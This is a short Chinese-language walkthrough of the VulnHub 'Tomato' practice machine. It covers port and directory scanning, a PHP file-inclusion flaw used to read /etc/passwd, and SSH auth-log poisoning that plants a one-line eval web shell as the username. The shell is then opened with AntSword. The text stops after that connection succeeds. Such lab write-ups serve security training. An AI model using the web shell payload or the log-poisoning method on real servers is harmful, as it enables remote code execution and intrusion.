靶机地址：

https://download.vulnhub.com/tomato/Tomato.ova 

靶机环境：Vmware

网络：NAT模式

信息收集：

arp-scan -l    扫描靶机ip地址

扫描开放的端口信息        nmap -sS -sV -p- 192.168.77.135

发现开放端口21，80,2211，8888.

既然开放了web端口，那看看它有什么

 dirb http://192.168.77.135     扫描目录

 访问发现存在目录遍历。

 查看infoPHP文件的源码，文件包含的代码“include”

 漏洞利用：

读取一下etc/password，读取成功，存在文件包含漏洞。

 之前扫描出来 2211 远程连接端口,尝试连接,然后访问日志/var/log/auth.log,发现无论是否连接成功,日志中都会出现用户名及其操作

将一句话木马作为用户名使用 ssh 连接靶机 ip

注:这里 kali 出问题,用户名内不能有特殊字符,随便切换一个 linux 主机连接即可

ssh '<?php eval($_POST[cmd]); ?>'@192.168.77.135 -p 2211

写入成功.

 使用蚁剑连接日志地址试试

连接成功 得到信息